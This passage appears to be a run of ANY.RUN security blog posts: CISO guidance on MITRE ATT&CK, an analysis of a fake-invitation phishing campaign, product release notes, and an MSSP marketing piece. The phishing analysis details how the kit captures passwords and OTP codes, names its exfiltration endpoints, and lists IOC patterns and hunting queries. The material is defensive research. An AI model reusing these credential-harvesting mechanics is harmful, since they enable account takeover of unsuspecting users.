Threat Intelligence Lookup is a searchable threat data repository built on ANY.RUN’s analysis history. Analysts can query file hashes, IPs, domains, URLs, and process names and instantly surface related sandbox reports with MITRE ATT&CK mappings, malware family attributions, and associated threat actor context.  

During triage, analysts can answer the key questions before escalating: Is this a known threat? What does it do? Which ATT&CK techniques are involved? What is the likely impact?  

Interactive Sandbox complements TI Lookup for unknown samples. If an URL yields no TI Lookup match, analysts can submit it to the sandbox and receive a full behavioral report (process tree, network activity, file system changes, and ATT&CK technique tags) in minutes.  

Unlike automated sandboxes that process samples silently, ANY.RUN lets analysts interact with the execution — clicking through prompts, observing network connections, and watching process trees unfold — while the sandbox maps every observed behavior to MITRE ATT&CK techniques in real time.   

Business objective: Reduce mean triage time per alert. Decrease false positive escalations. Increase analyst capacity without headcount growth, enabling the SOC to handle greater alert volume at the same staffing level. 

3. Incident Response: From Labels to Action 

MITRE ATT&CK gives incident responders a structured model for understanding what an adversary may have done across the kill chain. It offers a common language and playbooks for containment, full visibility into attacker actions for precise, minimal-disruption response. This is genuinely valuable for architecting investigations and communicating findings to stakeholders. 

What the SOC Actually Needs 

During an active incident, responders need execution context. Which processes ran? In which order? What registry keys were modified? Which files were dropped and where? Which internal hosts did the malware beacon to? Without this granular execution responders end up remediating visible symptoms while the attacker maintains persistence through overlooked footholds. 

Solution: Compress Containment Time with Complete Execution Context 

Interactive Sandbox generates a complete execution timeline for any submitted sample: full process trees (parent/child relationships, command-line arguments), all network connections (DNS queries, HTTP/S requests, C2 communication patterns), file system changes (created, modified, deleted files), and registry modifications.  

Every action is timestamped and tagged with the corresponding MITRE ATT&CK technique. Responders don’t need to reconstruct what malware did from endpoint telemetry alone. They have a ground-truth behavioral record from a controlled detonation. 

TI Lookup accelerates the lateral movement investigation. If an incident involves a suspicious IP or domain used for C2, TI Lookup surfaces all previous ANY.RUN analyses involving that indicator. It helps reveal which malware families have used it, when, and in what context.  

Business objective: Reduce mean time to contain (MTTC) by giving responders complete execution context at the start of an investigation. Decrease re-infection rates by ensuring all persistence mechanisms are documented and remediated. Reduce incident response costs by compressing investigation timelines. 

4. Proactive Defense: Supercharging Threat Hunting with Real Patterns 

Threat hunting (proactively searching for adversary presence that evaded automated defenses) is where MITRE ATT&CK suggests hypotheses: if you are in a financial services organization, groups like FIN7 or Carbanak are relevant threats; their documented techniques (T1059, T1027, T1547) suggest where to look in your telemetry. This starting point is invaluable. 

What the SOC Actually Needs 

A successful hunt requires more than “look for PowerShell abuse”. It requires the specific parent-child process relationships, the exact command-line patterns, the particular registry keys, the network destinations that real-world attackers targeting your industry have actually used recently. Generic ATT&CK-based hunt queries produce excessive noise and burn hunter time on false leads. Real attack patterns are the fuel that makes hunts productive. 

Solution: Turn Hunt Hypotheses into High-Yield Findings with Real Attacker Patterns 

Threat Intelligence Lookup enables hunt pivoting at scale. A hunter who identifies a suspicious process name can query TI Lookup to find all samples that share that process, discover related IOCs, identify the malware family, and extract the precise command-line patterns that family uses. This turns a single hunt lead into a comprehensive behavioral profile needed to write high-confidence hunt queries. 

The combination of TI Feeds and TI Lookup transforms threat hunting from a creative exercise into an evidence-based discipline grounded in real adversary behavior. 

Business objective: Increase the yield rate of threat hunts (confirmed findings per hunt hour). Identify attacker dwell time earlier, reducing the average time an adversary operates undetected inside the network. Demonstrate proactive risk reduction to board and audit stakeholders. 

Conclusion: From Framework to Force Multiplier 

MITRE ATT&CK has fundamentally changed how the security industry thinks about risk: from abstract control gaps to concrete adversary behaviors. For CISOs, this shift represents an opportunity to speak a language that resonates equally in the boardroom and the SOC: the language of what attackers actually do, and how prepared your organization is to detect, contain, and recover. 

But the framework’s potential is only realized when it is connected to operational reality. MITRE ATT&CK without actionable threat intelligence is a map without territory. The SOC workflows that matter (monitoring, triage, incident response, and threat hunting) all require real-world adversary data to function at the speed and fidelity modern threats demand. 

ANY.RUN’s threat analysis and intelligence products are purpose-built to close this gap. Together, they transform MITRE ATT&CK from a conceptual framework into an operational engine that drives measurable risk reduction across every phase of the security operations cycle. 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams detect, investigate, and respond to threats faster.

ANY.RUN solutions include Interactive Sandbox, Threat Intelligence Lookup, Threat Intelligence Feeds, and integrations for SOC workflows across SIEM, SOAR, EDR, and other security tools. Together, they help teams safely analyze suspicious links, files, and scripts, uncover phishing behavior, trace credential theft and remote access activity, and enrich investigations with real-world threat context.

Built for security-conscious organizations, ANY.RUN is SOC 2 Type II attested and supports enterprise-ready controls such as SSO, MFA, granular privacy settings, and AES-256-CBC encryption.

Trusted by more than 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN gives SOC teams the visibility they need to move from uncertain alerts to evidence-based decisions.

FAQ 

The post How CISOs Reduce Cyber Risk with MITRE ATT&CK  appeared first on ANY.RUN's Cybersecurity Blog.

ANY.RUN researchers found that the campaign uses a repeatable phishing framework to create event-themed lure pages at scale. Some pages steal email credentials and OTP codes, while others deliver legitimate remote management tools such as ScreenConnect, ITarian, Datto RMM, ConnectWise, and LogMeIn Rescue.

For CISOs, the risk is not just another phishing wave. It is the combination of credential theft, trusted remote access tools, and infrastructure designed to look legitimate. That mix can delay detection, stretch SOC triage, weaken response confidence, and create a path to remote access before the business fully understands what happened.

Key Takeaways

• A large-scale fake invitation phishing campaign is targeting U.S. organizations: ANY.RUN researchers found nearly 160 suspicious links related to the campaign and around 80 phishing domains.
• The campaign creates more than one access risk: Some lure pages steal email credentials and OTP codes, while others deliver legitimate RMM tools for remote management.
• The early attack flow can look routine: Victims see a CAPTCHA check and an event invitation page before the campaign moves toward credential theft or RMM delivery.
• Repeatable infrastructure gives SOC teams huntable signals: Shared URL patterns, fixed resource paths such as /Image/*.png, and requests to /favicon.ico and /blocked.html help connect related activity.
• For CISOs, the risk is delayed detection and response: One fake invitation can lead to mailbox compromise, OTP interception, or remote access before the business has clear evidence of impact.
• ANY.RUN helps CISOs strengthen phishing response readiness: SOC teams get the visibility to validate threats faster, reduce gray-zone investigations, and contain risk before it becomes account compromise or remote access.

The Phishing Blind Spot CISOs Need to Close 

Most enterprise security programs are built to catch obvious signs of compromise: known malicious domains, suspicious payloads, credential abuse, or unauthorized remote access. This campaign creates a harder problem because the early stages can look like normal user behavior.

The attack starts with a CAPTCHA check and a fake event invitation. From there, it can lead to credential theft, OTP interception, or the installation of a legitimate RMM tool. Each step may look harmless inisolation, but together they create a path to account compromise or remote access.

For CISOs, the risk is clear: if the SOC only reacts after credentials are stolen or remote access is established, the organization is already behind the attack.

The outcome can be serious: 

• Slower detection because early phishing signals look routine 
• Greater chance of unauthorized access through legitimate RMM tools
• Higher risk of credential and OTP compromise 
• More pressure on SOC teams to connect fragmented signals quickly 
• Delayed containment when domains and lure pages keep changing 
• Weaker confidence that phishing activity is being caught before business impact 

High-Exposure Sectors for This Campaign 

ANY.RUN’s Threat Intelligence shows that most analysis tasks related to this campaign came from the United States, suggesting that U.S. organizations may be the primary target.

As of April 27, nearly 160 suspicious links related to this campaign had been analyzed in ANY.RUN’s sandbox, with around 80 phishing domains identified. Most of these domains were registered underthe .de top-level domain, starting from December 2025.

TI Query: url:”/blocked.html” AND url:”/favicon.ico” and url:”/Image/*.png” 

The most affected industries include Education, Banking, Government, Technology, and Healthcare — sectors where email access, identity, and remote administration are part of everyday operations.

For CISOs in these sectors, the concern is practical: one fake invitation can lead to stolen mailbox access, intercepted OTP codes, or a remote access tool running inside the environment.

The campaign also shows signs of scale. Threat actors appear to use a single framework to mass-deploy event-themed lure sites, while some page elements suggest possible AI-assisted generation. For security teams, this means the attack surface can change quickly, but the repeatable structure creates detection opportunities. When SOC teams can catch these patterns early, they can reduce investigation uncertainty, validate threats faster, and contain phishing activity before it turns into account compromise or remote access.

How the Campaign Moves From Lure to Access 

On April 22, 2026, ANY.RUN researchers identified a phishing campaign targeting email service credentials and, in some cases, delivering remote management software. 

Fake Invitation Pages as the Entry Point 

The campaign uses fake event invitation pages as the main lure. Victims are first taken through a CAPTCHA check, most often from Cloudflare, although other providers also appear in some cases. After that, they land on a phishing page telling them they have received an invitation.

From there, the campaign can move in two directions. Some pages are built to steal credentials. Others are designed to deliver remote management tools. 

In the RMM delivery flow, the page may show a single download button or skip the button entirely and start the download automatically. In one ANY.RUN analysis session, the lure page starts the download without requiring further action from the user:

View analysis session with lure 

In another session, the page includes a download button, but the file still begins downloading automatically: 

View analysis session with download button 

Additional lure pages following the same pattern were also observed: 

View analysis session 

Check out other sandbox sessions with the fake invitation: 

• Analysis session 1 
• Analysis session 2 

ANY.RUN researchers also found signs that some pages were created using a shared phishing site toolkit, or phish kit. The code in several sessions contained instructions for the campaign operator on how to edit the page, suggesting a reusable setup for building and launching new lure sites quickly: 

• Analysis session 1 
• Analysis session 2  

The examples above represent a sample of the activity observed by ANY.RUN researchers and illustrate the common structure used in phishing pages that deliver RMM tools.

The remote management tools most often installed in these campaigns include ScreenConnect, ITarian, Datto RMM, ConnectWise, and LogMeIn Rescue.

When the goal is credential theft, the page changes, but the entry point stays the same. In this analysis session, the chain also begins with a CAPTCHA check:

Check analysis session 

After the check, the user is shown an event invitation message and prompted to sign in with one of the available services. An example of this message is shown below:

Reusable phishing infrastructure 

The credential theft pages follow a consistent structure across the phishing domains. In most cases, only the logo at the top of the page changes. 

The phishing URLs also follow a repeatable format: https://<phish-site>/<url-pattern>/<endpoint>

Domain names often include words related to events, invitations, greetings, parties, and similar themes. Examples include festiveparty.us, getceptionparty[.]de, and celebratieinvitiee[.]de, all of whichwere observed in related ANY.RUN analysis sessions:

• Analysis session with getceptionparty[.]de 
• Analysis session with celebratieinvitiee[.]de 

Another campaign marker is the way service icons are loaded on the phishing page. The icons are consistently stored under the same path: /Image/*.png 

The typical icon set includes: 

• office360.png 
  (SHA-256 887bc414bdb32b83dcfccdd3c688e90d9a87a0033e3756a840f9bdd2d65c5c74); 
• office.png 
  (SHA-256 6eaa0a448f1306bcf4159783eeafe5d37243bd8ca2728db7d90de1929241dd29); 
• yahoo.png 
  (SHA-256 4c373bc25cb71dbb75e73b61dff25aa184be8d327053a97202a6b1a5919cab0d); 
• google.png 
  (SHA-256 a838f99537d35e48e479a34086297f76db5d3363b0456f23d10d308f0d30ed82); 
• aol.png 
  (SHA-256 8e94c18bbcad0644c4b04de4356fe37da9996fdf1c99bc984ba819862a9b1889); 
• email.png 
  (SHA-256 9a53e032a6e3e79861d28568c3b6ffc97f4f3c1d3af65a703ec12966420503d9). 

Another distinctive feature of this campaign is the sequential request for the following resources: <evilsite>/favicon.ico <evilsite>/blocked.html

As a result, when a user opens the phishing link, the following request chain is always observed: 

GET /  
  ├─ GET /favicon.ico 
  ├─ GET /blocked.html 
  └─ GET /<url-pattern>/Image/*.png 

This request chain can be observed in the following ANY.RUN analysis session:

Check analysis with observed request chain 

<url-pattern> is unique for each domain, but it often follows the same naming logic and includes repeated event-related keywords.

Analysts can use this pattern to find related phishing domains in ANY.RUN’s Threat Intelligence Lookup with the following query: url:”/blocked.html” AND url:”/favicon.ico” and url:”/Image/*.png”

Credential Interception Flows 

The campaign uses two credential interception flows: one for Google accounts and another for non-Google services. The following ANY.RUN analysis session shows both flows in action:

Check analysis session with both interception flows 

Non-Google credential interception 

When the user selects any service other than Google, the phishing page opens a login window asking for an email address and password, as shown below.

After the first password entry, the page always displays an “Incorrect Password” message. This prompts the user to enter the password again, helping the attackers capture a second attempt in case the first one contained a typo.

When the user enters their credentials and clicks Login, the page sends a POST request to the same server at the /processmail.php endpoint, submitting the email address and password.

Then, an OTP code entry form appears. This form is also the same across all phishing sites used in this campaign.

When the user enters the code and clicks Submit, the page sends a POST request to the same server at the /process.php endpoint, submitting the OTP code.

After the OTP is entered, the page displays a placeholder message, as shown in the image below. At this stage, the credentials needed to access the service are already in the attacker’s hands. 

Google credential interception 

When the user selects Gmail as the login method, a different chain is observed. First, the user is redirected to a page disguised as a Google authorization form.

When the user enters their login and password, the page sends POST requests to the /pass.php and /mlog.php endpoints. 

The request to /pass.php sends the login and the request to /mlog.php sends the password: 

Then, the page sends a request to the `/check_telegram_updates.php` endpoint, with the user ID included in the request body. 

At the end of the chain, the victim is redirected to the legitimate google.com page. 

How CISOs Can Reduce the Risk Behind Fake Invitation Campaigns 

Campaigns like this are difficult because they do not create one obvious security event. The same lure can lead to credential theft, OTP interception, or remote access tool installation. For SOC teams, that means the risk is spread across several small signals that need to be connected quickly. 

To reduce exposure, security leaders need visibility earlier in the chain, before stolen credentials are used, before OTP codes are intercepted, and before a remote access tool becomes a foothold inside the environment. 

ANY.RUN brings that visibility into the full SOC investigation process. During triage, analysts can open suspicious links safely inside a cloud-based, interactive sandbox and quickly confirm whether the page leads to a fake invitation, credential form, OTP prompt, or RMM download. During behavioral analysis, they can observe network requests, credential submission endpoints, file downloads, execution behavior, and remote access activity as it happens. 

That visibility gives teams a stronger basis for response. Teams will understand what was exposed, whether access was attempted, and which containment steps are needed. With ANY.RUN Threat Intelligence, they can extend the investigation into threat hunting by finding related domains, repeated URL patterns, shared phishing infrastructure, and similar analyses across industries. 

For CISOs, this supports the outcomes that matter most: 

• Fewer gray-zone investigations where teams struggle to prove whether activity is malicious 
• Faster threat confirmation before credentials, OTP codes, or remote access are abused 
• Clearer containment decisions based on visible attack behavior, not assumptions 
• Stronger phishing coverage across both credential theft and RMM delivery paths 
• Better confidence in SOC readiness when phishing campaigns scale across domains and industries 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams detect, investigate, and respond to threats faster.

ANY.RUN solutions include Interactive Sandbox, Threat Intelligence Lookup, Threat Intelligence Feeds, and integrations for SOC workflows across SIEM, SOAR, EDR, and other security tools. Together, they help teams safely analyze suspicious links, files, and scripts, uncover phishing behavior, trace credential theft and remote access activity, and enrich investigations with real-world threat context.

Built for security-conscious organizations, ANY.RUN is SOC 2 Type II attested and supports enterprise-ready controls such as SSO, MFA, granular privacy settings, and AES-256-CBC encryption.

Trusted by more than 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN gives SOC teams the visibility they need to move from uncertain alerts to evidence-based decisions.

Indicators of Compromise 

URL patterns: 

hxxps://<phish_site>/<url-pattern>/Image/office360.png 

hxxps://<phish_site>/<url-pattern>/Image/office.png 

hxxps://<phish_site>/<url-pattern>/Image/yahoo.png 

hxxps://<phish_site>/<url-pattern>/Image/google.png 

hxxps://<phish_site>/<url-pattern>/Image/aol.png 

hxxps://<phish_site>/<url-pattern>/Image/email.png 

hxxps://<phish_site>/blocked.html 

hxxps://<phish_site>/<url-pattern>/processmail.php 

hxxps://<phish_site>/<url-pattern>/process.php 

hxxps://<phish_site>/<url-pattern>/pass.php 

hxxps://<phish_site>/<url-pattern>/mlog.php 

hxxps://<phish_site>/<url-pattern>/check_telegram_updates.php 

Domains:

The current list of domains can be retrieved using the following query in ANY.RUN Threat Intelligence Lookup: url:”/blocked.html” AND url:”/favicon.ico” and url:”/Image/*.png”

The post New Phishing Campaign Targets US with Credential Theft: What CISOs Need to Know appeared first on ANY.RUN's Cybersecurity Blog.

The biggest change is expanded access to Threat Intelligence: Free plan users now get 20 premium requests in TI Lookup and YARA Search. This gives security teams a practical way to check suspicious indicators, explore related sandbox sessions, and validate malware or phishing activity using real attack data. 

On the detection side, our team added 78 new behavior signatures, 1,657 new Suricata rules, and 35 new YARA rules. We also released new Threat Intelligence Reports covering malware, loaders, RATs, backdoors, and supply-chain threats observed in recent submissions. 

Here’s a closer look at what’s new. 

Product Updates 

In April, ANY.RUN expanded access to Threat Intelligence capabilities, giving more teams a way to test threat context directly in their SOC workflows. 

The key update: Free plan users now get 20 premium requests in TI Lookup and YARA Search. This gives security teams a practical way to check indicators, explore related sandbox sessions, and validate suspicious activity using real attack data from ANY.RUN’s community. 

More Threat Context with 20 Premium TI Requests 

Threat intelligence brings the most value when it helps teams make faster decisions during active investigations. Instead of stopping at one suspicious IP, domain, hash, or behavior, analysts can pivot to connected samples, infrastructure, artifacts, and attack context. 

With 20 premium requests now included in the Free plan, SOC and MSSP teams can explore threat data across IOCs, IOBs, and IOAs linked to recent malware and phishing activity. 

Teams can use this expanded access across key SOC workflows: 

• Alert triage: Check suspicious indicators against real sandbox data and get more context before closing or escalating an alert. 
• Incident response: Pivot from one indicator to related artifacts, infrastructure, and behavior to understand the wider attack chain. 
• Threat hunting: Use TI Lookup and YARA Search to test hypotheses against real-world malware data.
• Detection work: Find patterns and artifacts that can support new or improved detection logic. 

ANY.RUN also introduced AI-assisted search in TI Lookup, allowing users to describe what they need in natural language while the system helps translate the request into a structured query. 

With threat intelligence available directly in the workflow, SOC and MSSP teams can move faster from suspicious signal to confident action: 

• Faster alert validation: Teams can check suspicious indicators against real attack data and make decisions sooner. 
• Lower escalation noise: More context helps reduce escalations driven by uncertainty. 
• Shorter investigations: Analysts can move from one indicator to related samples, infrastructure, and behavior faster. 
• Stronger threat hunting: Teams can test hypotheses against current malware and phishing data. 
• Better detection quality: Real-world artifacts and behavior patterns can support more relevant detection logic. 
• More measurable security value: Faster triage, better prioritization, and clearer evidence help teams focus capacity on confirmed risk. 

Threat Coverage Updates 

In April, our detection team continued to strengthen ANY.RUN’s threat coverage with new behavior signatures, Suricata rules, and YARA rules. 

This month’s updates include: 

• 78 new behavior signatures 
• 1,657 new Suricata rules 
• 35 new YARA rules 

These additions help expand detection coverage across suspicious behavior, network activity, and file-based indicators. 

New Behavior Signatures  

In April, we added 78 new behavior signatures covering malware-specific activity, mutex-based indicators, suspicious persistence behavior, and exploitation-related activity. 

The new signatures focus on observable actions and artifacts that appear during detonation, helping teams move beyond file reputation and confirm what a sample actually does in the sandbox. 

Highlighted detections include: 

New Suricata Rules 

In April, we also added 1,657 new Suricata rules to improve visibility into malicious network activity, including payload retrieval, DLL downloads, and possible command-and-control checks. 

• DonutLoader base64-exe payload retrieval via HTTP (sid: 85007037): Detects malware’s attempts to get executable payload from stager server via HTTP 
• Winos/ValleyRAT DLL download via TCP (sid: 85007024): Identifies ValleyRAT related DLL-file downloads via non-standard port TCP connection 
• Possible AsyncRAT-style TCP C2 connectivity check (sid: 85007061): Heuristic rule tracking AsyncRAT-like malware implementations, based on set of connections to specific ports on the same host, likely checkingconnectivity with C2. 

With these additions, sandbox sessions can surface more network-level indicators tied to malware delivery and post-infection communication. 

New YARA Rules 

In April, ANY.RUN added 35 new YARA rules to expand static detection coverage for suspicious files and known threat artifacts. 

This layer is especially useful when a sample contains recognizable strings, code patterns, or structural markers that can link it to a known detection before or alongside behavior-based analysis. 

Highlighted YARA detections include: 

• Sentinel 
• Datto 
• Spank 
• DefendNot
• Raton 

Together, the new behavior signatures, Suricata rules, and YARA rules give security teams broader coverage across runtime behavior, network traffic, and file-level indicators. 

Threat Intelligence Reports 

In April, our team released new Threat Intelligence Reports covering recent malware activity, attacker tooling, and techniques observed across real-world submissions. 

Available as part of ANY.RUN’s TI Lookup Premium plan, these reports give security teams a clearer view of how specific threats behave, what artifacts they leave behind, and which indicators can support faster investigation. 

• MIMIC, CrystalX, and Trojanized Telnyx Package: This report covers MIMIC ransomware, CrystalX RAT, and a trojanized Telnyx Python SDK, focusing on encryption behavior, remote access and persistence, and malicious code execution through unauthorized PyPI releases. 

• ETHERRAT, OCRFix, and SILENTCONNECT: This brief examines a Node.js backdoor, a loader/botnet component, and a Windows loader, focusing on blockchain-based C2/configuration retrieval, scheduled-task persistence, in-memory PowerShell execution, and ScreenConnect deployment. 

• CRYSOME, INFINITY, and BRUSHWORM: This report examines a Windows RAT, a macOS stealer, and a Windows backdoor, focusing on TCP-based remote control, ClickFix-like delivery, credential theft, scheduled-task persistence, modular DLL download, and file theft. 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and make confident decisions with real-world attack data. 

Its solutions, including Interactive Sandbox and Threat Intelligence, give SOC and MSSP teams the context they need to analyze malware, phishing, infrastructure, behaviors, and indicators in one workflow. 

Trusted by more than 15,000 organizations and 600,000 security professionals worldwide, including 74% of Fortune 100 companies, ANY.RUN helps teams improve triage speed, strengthen detection coverage, reduce investigation time, and respond to emerging threats with clearer evidence. 

Integrate ANY.RUN into your SOC workflow → 

The post Release Notes: Expanded Threat Intelligence Access, AI Assisted Search 1,770 New Detections and More appeared first on ANY.RUN's Cybersecurity Blog.

For MSSP leaders, this looks like an opportunity. And it is. The problem is that seizing it costs more than it used to. 

Key Points 

• Linear scaling kills margins.  
  Adding more clients traditionally requires proportionally more analysts, making profitable growth nearly impossible. 

• Alert noise is expensive. 
  Up to 70% of alerts are false positives that waste analyst time and inflate operational costs. 

• Context gaps slow everything down. 
  Disconnected tools force manual aggregation of data from multiple systems, delaying investigations. 

• Tool switching destroys efficiency. 
  Constant platform hopping increases turnaround time and contributes to missed SLAs. 

• Standardization is essential for multi-client environments. 
  Every client being unique creates bespoke processes that do not scale and accelerate analyst burnout. 

• ANY.RUN’s Threat Intelligence (TI Lookup + TI Feeds) and Interactive Sandbox work as an integrated infrastructure layer that reduces manual labor and improves unit economics. 

• True scalability comes from automation and shared context. 
  MSSPs can serve more clients at higher quality without linear headcount increases, while lowering stress and turnover. 

The quiet storm inside every MSSP 

Threat actors automate attacks at unprecedented speed, while client environments grow more complex and diverse. MSSP leaders face mounting pressure to deliver faster, deeper, and more reliable protection across dozens or hundreds of customers: all while keeping margins healthy and SLAs intact. 

• More clients still often means more analysts; 
• More alerts still means more noise; 
• More data still doesn’t mean more clarity. 

Meanwhile, the analysts carrying the weight are burning out. Turnover in MSSP analyst roles is among the highest in the industry, creating a perpetual cycle of recruitment, onboarding, and knowledge loss that compounds every other problem. 

MSSP leaders aren’t looking for “another feature.” They’re looking for something closer to an operational backbone. Something that reduces manual effort and improves unit economics without adding complexity. 

1. Linear Growth Equals Margin Death: The Scalability Trap 

For many MSSPs, growth is a paradox: every new client increases revenue — but also operational cost at nearly the same rate. Hiring, training, and retaining talent is expensive and painful, with turnover creating constant friction. The more manual the work your analysts do per client, the harder it is to decouple revenue from headcount.  

Your revenue line and your cost line climb together, and the margin in between never quite widens the way a growth business should. 

How ANY.RUN helps 

The Interactive Sandbox directly attacks the cost-per-investigation problem by compressing deep malware analysis from hours to minutes and speeding up triage, so each analyst can handle significantly more cases without sacrificing quality or output depth. 
 
To see how the Sandbox automatically interacts with malware detonating the kill chain elements and eliminating the need for manual interventions for a malware analyst, view an analysis session:

Threat Intelligence Lookup removes repetitive investigation steps by providing instant access to previously analyzed artifacts, indicators, and behaviors. It supports quick search across a huge database of contextual data on indicators and attacks drawn from sandbox investigations of over 15K SOC teams that are using ANY.RUN.  

Together, these solutions shift effort from linear human scaling to knowledge reuse and automation. Analysts spend less time rebuilding context and more time making decisions. 

2. Alert Noise Equals Wasted Money 

With up to 70% of alerts representing noise, MSSPs burn resources investigating false positives. Every unnecessary alert translates into extra analyst time, higher operational costs, and increased risk of missing genuine threats amid the fatigue. 

The downstream effects compound quickly. Analysts fatigued by noise start to triage faster and less carefully. Real threats get downgraded. Critical detections get buried under the volume. The service quality the MSSP is paid to deliver degrades — quietly, then suddenly. 

How ANY.RUN helps 

ANY.RUN Threat Intelligence — comprising TI Lookup and Threat Intelligence Feeds — puts a verification and enrichment layer in front of the analyst queue, so that the 70% that doesn’t matter gets filtered before it consumes investigation resources, and the 30% that does matter arrives with actionable context. 

• Cuts false positive handling time; 
• Raises triage confidence; 
• Reduces analyst fatigue across multi-client environments; 
• Feeds directly into SIEM and SOAR workflows. 

TI Lookup provides on-demand, deep queries across a continuously updated database of threats, allowing an analyst to determine in seconds whether a suspicious IP, domain, file hash, or URL is genuinely malicious, benign, or requires deeper analysis. 

destinationIP:”103.224.212.211″ 

TI Feeds deliver structured, high-fidelity threat data enriched with behavioral context that integrates directly into SIEM and SOAR workflows.  

Instead of raw indicator lists that require manual validation, analysts receive intelligence that has already been correlated with real-world malware behavior observed in the Sandbox. The noise doesn’t just get filtered; it gets explained. Analysts spend time on what matters, and triage decisions become faster and more defensible. 

3. Missing Context: The Manual Puzzle Problem 

An MSSP analyst’s work happens across a fractured landscape. Threat intelligence feeds live in one place. SIEM alerts in another. Endpoint telemetry in a third. Sandboxing results in a fourth. An analyst responding to an incident doesn’t get the full picture handed to them. They construct it, manually, by pulling data from multiple sources, correlating it in their head or in a spreadsheet, and hoping nothing slips through the cracks. 

This manual context assembly is slow, error-prone, and analyst-dependent. Investigations that should take minutes take hours. And in a threat landscape where speed matters, fragmented context is a liability that shows up in missed detections and broken SLAs. 

How ANY.RUN helps 

ANY.RUN collapses the distance between intelligence and action by delivering investigation context as a connected whole, giving MSSPs faster incident resolution, less analyst-dependent knowledge, and investigation outputs that hold their value even when team composition changes. 

• Eliminates manual context assembly; 
• Connects intelligence to behavior; 
• Reduces investigation time per incident. 

ANY.RUN’s modules are designed for seamless integration and context sharing. The Interactive Sandbox delivers comprehensive behavioral data in one place: processes, network activity, MITRE ATT&CK mappings, and more. TI Lookup instantly correlates any indicator (IOC, IOA, or IOB) with related threats, full attack chains, and supporting sandbox reports. TI Feeds extend this intelligence across the entire stack, feeding enriched data into existing workflows. 

Analysts no longer “build the picture manually.” They access unified, actionable intelligence that accelerates triage, investigation, and reporting across all clients, reducing context gaps and enabling consistent, high-quality outcomes. The investigation pipeline becomes a connected workflow rather than a manual collage. 

4. Tool-Switching: The Hidden Time Tax 

Constantly jumping between platforms kills efficiency and extends turnaround times. Analysts lose momentum with every tab switch, every login, and every manual data transfer, directly impacting SLA compliance and team morale. 

When tools are slow, unreliable, or disconnected, analysts route around them. They rely on memory, on informal knowledge-sharing, on workarounds. All of it introduces inconsistency and risk. 

How ANY.RUN Helps 

ANY.RUN’s API-first architecture is built to disappear into the workflows analysts already use, surfacing intelligence in the context where work is happening, rather than requiring analysts to pivot toward it. The result is less friction, higher adoption, and more consistent investigation quality across the team. 
 
TI Lookup and TI Feeds can be embedded directly into SIEM, SOAR, and ticketing environments, so analysts can surface intelligence without leaving the context they’re already working in. The Interactive Sandbox can be invoked as part of an automated or semi-automated investigation pipeline, with results returned in structured, machine-readable formats that feed directly into case management. 

The goal is to make ANY.RUN invisible in the best sense: present at every stage of investigation, without requiring analysts to pivot their attention toward it. 

5. No Standardization — Scaling Chaos Across Clients 

No two MSSP clients are alike. One runs a legacy on-premises environment with minimal telemetry. Another is cloud-native with dozens of SaaS integrations. A third has custom applications, bespoke logging configurations, and a security team with strong opinions about how investigations should be documented. For the MSSP trying to serve all three, the challenge isn’t just operational: it’s structural. 

When client environments are siloed, institutional knowledge about one doesn’t transfer to another. When investigation workflows differ by engagement, onboarding new analysts takes longer, errors are harder to catch, and QA becomes a guessing game. What scales, in the absence of standardization, is chaos. And chaos has a cost. 

How ANY.RUN helps 

ANY.RUN Threat Intelligence was built with multi-tenant MSSP operations in mind. 

• Normalizes intelligence across client environments; 
• Gives analysts a single investigative interface; 
• Standardizes investigation outputs; 
• Shortens analyst onboarding. 

TI Feeds deliver structured, consistently formatted intelligence that can be normalized and applied across client environments without per-client customization of the data layer.  

TI Lookup gives analysts a single investigative interface regardless of which client environment they’re working in. And the Interactive Sandbox produces structured, reproducible analysis outputs — process trees, network maps, MITRE mappings, IOC exports — that can be templated into client-specific reporting workflows without requiring analysts to rebuild their investigation approach from scratch each time. 

Standardization doesn’t mean treating every client the same. It means having a consistent intelligence layer beneath the client-specific details, so that quality and speed hold constant even as the client roster grows. 

Analyst burnout (the pain that amplifies all others) 

When systems don’t scale, people absorb the pressure. Overload, repetitive work, constant alert fatigue — this is where everything converges. 

Burnout isn’t just a people problem. It’s an operational risk: 

• Higher turnover; 
• Knowledge loss 
• Reduced investigation quality 

How ANY.RUN helps 

By reducing noise, minimizing manual work, and accelerating investigations, the combined capabilities of Interactive Sandbox, TI Lookup, and TI Feeds directly lower cognitive and operational pressure. Analysts move from reactive overload to structured, efficient workflows. 

Conclusion: What MSSPs Are Actually Looking For 

The pains above are not independent problems. They are interconnected symptoms of the same underlying condition: MSSP operations that have scaled their client load without scaling the intelligence infrastructure underneath it. 

MSSPs don’t need more isolated features. They need: 

• Less manual aggregation; 
• Less switching; 
• More context, faster; 
• Reliable, always-available capabilities; 
• Infrastructure that improves margins, not just performance. 

When Threat Intelligence Lookup and Threat Intelligence Feeds operate as a unified threat intelligence layer, and Interactive Sandbox feeds it with fresh behavioral data, the result isn’t just efficiency. It’s a shift in how MSSPs operate: from effort-heavy scaling to intelligence-driven scaling.  

About ANY.RUN

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.   

It allows teams to safely execute suspicious files and URLs, observe real behavior in an Interactive Sandbox, enrich indicators with immediate context through TI Lookup, and monitor emerging malicious infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.   

ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is SOC 2 Type II certified, demonstrating its commitment to protecting customer data and maintaining strong security controls. 

FAQ

The post Margin vs. Madness: Fixing MSSP Top 5 Operational Nightmares appeared first on ANY.RUN's Cybersecurity Blog.